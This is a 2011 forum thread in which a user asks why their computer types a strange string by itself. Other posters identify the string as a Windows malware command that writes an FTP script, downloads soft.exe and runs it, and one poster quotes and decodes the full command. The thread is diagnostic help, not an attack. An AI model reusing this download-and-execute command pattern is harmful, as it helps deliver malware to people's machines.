# What the hell is wrong with my computer?



## Bir (Jan 26, 2011)

Okay. So my computer keeps typing random shit. I'll be talking through chat on FB, or searching for something in google, or even typing here on FA. It's always the same thing, too. What the hell is it? I haven't found anything online that has to do with it.

Additional info: 
-This happens when I am not touching the keyboard at all.
-I am on Ubuntu.
-Nothing is wrong with my keyboard.
-This computer is a Dell.

This is what it always types out:

"*SER TELNET >> IK &ECHO BINARY >> IK &ECHO GET  SOFT.EXE >> IK &ECHO BYE >> IK &FTP -N -V -S:IK  &DEL IK &SOFT.EXE &EXIT"




*


----------



## Smelge (Jan 26, 2011)

I'm no expert, but that looks suspiciously like something on your computer is trying to connect to something and download something else.


----------



## Bir (Jan 26, 2011)

Eucchkkkkk. x.x;


----------



## Smelge (Jan 26, 2011)

It probably isn't though. As I said, I'm no expert, and if there was something on your computer trying to download shit, then I would have thought it would be bad form to actually do it while someone is typing.


----------



## LizardKing (Jan 26, 2011)

http://ubuntuforums.org/showthread.php?t=1244618

That's the only other reference to it I could find


----------



## Bir (Jan 26, 2011)

Smelge said:


> It probably isn't though. As I said, I'm no expert, and if there was something on your computer trying to download shit, then I would have thought it would be bad form to actually do it while someone is typing.


 
I wonder if it's part of Kyle's stuff or something. I know he's always messing with the Ubuntu code thing or whatever it is, command center thing, and maybe he has a random command lying around?


----------



## Bir (Jan 26, 2011)

Thanks Lizard, that helps a bit.


----------



## Bir (Jan 26, 2011)

Okay. So so far what I'm getting is that there's possibly an HP in our area that is infected and is trying to affect this one.

Well, there are tons of computers in the area. I have a brand new HP mini and an Alienware in the house, but nothing is wrong with either of those. 

So it could possible be a neighbor's computer, if that's the case at all. Mrrrp.


----------



## Smelge (Jan 26, 2011)

Ok, having a look again, it doesn't seem to be trying to grab a program off the net. It refers to FTP, but has nowhere to get it from. However, it looks like it is trying to run this Soft.exe. A quick google of that says it's a malicious program that you don't want to run, and it's left on your system by a trojan or worm.

Your best bet is to scan the living shit out of your computer and try to remove it.


----------



## Bir (Jan 26, 2011)

Hmm, alright.

Thanks everyone. Let's see if I can figure this out.


----------



## LizardKing (Jan 26, 2011)

> cmd /c echo open IP 21 >> ik &echo user dsluser telnet >> ik &echo binary >> ik &echo get soft.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &soft.exe &exit



After looking at it, it seems to build a file called "ik" that contains

```
open IP 21
user dsluser telnet
binary
get soft.exe
bye
```

Then uses that as a script for ftp, before deleting that file and running soft.exe

"IP 21" makes no sense though. Had it been a real IP I could understand.

Edit: Oh hang on, "IP" should be an IP, 21 is the ftp port. Bam. My guess is some dipstick ran the code without actually entering the IP.


----------



## Bir (Jan 26, 2011)

So it's making an "ik" file, or I have an "ik" file?

So far, after I searched the computer, nothing with "Ik" has come up other than one of my little sister's music files and whatever "$IKW9S84.tif" is.

I'm a bit computer stupid, please forgive me.


----------



## Smelge (Jan 26, 2011)

Search for Soft.exe

If it's on your computer, get rid of it.


----------



## Bir (Jan 26, 2011)

Didn't find anything by that name.


----------



## LizardKing (Jan 26, 2011)

Bir said:


> So it's making an "ik" file, or I have an "ik" file?
> 
> So far, after I searched the computer, nothing with "Ik" has come up other than one of my little sister's music files and whatever "$IKW9S84.tif" is.
> 
> I'm a bit computer stupid, please forgive me.


 
Well it would try to, had it been typed into the command line and not Facebook. It does delete it afterwards though. 

I also notice your text in the OP is not the full thing, it is missing "cmd /c echo open IP 21 >> ik &echo user dslu". Does it always start at "ser telnet"?


----------



## Bir (Jan 26, 2011)

Yes.


----------



## LizardKing (Jan 26, 2011)

Bir said:


> Yes.


 
Then it's totally broken. How often does it do it?

If it's fairly regular, check your background processes, look online if you're unsure of which ones are real ones, and close any dodgy ones one at a time and see when the messages stop.


----------



## Bir (Jan 26, 2011)

Kyle fix'd'd'd'd'd'd it.

It was a .exe hiding as a music file. Pro'lly just a trojan trying to eat at Ubuntu.


----------



## LizardKing (Jan 26, 2011)

Bir said:


> Kyle fix'd'd'd'd'd'd it.
> 
> It was a .exe hiding as a music file. Pro'lly just a trojan trying to eat at Ubuntu.


 
Oh piss, I forgot you were on Ubuntu. It would never work in the first place, haha.


----------

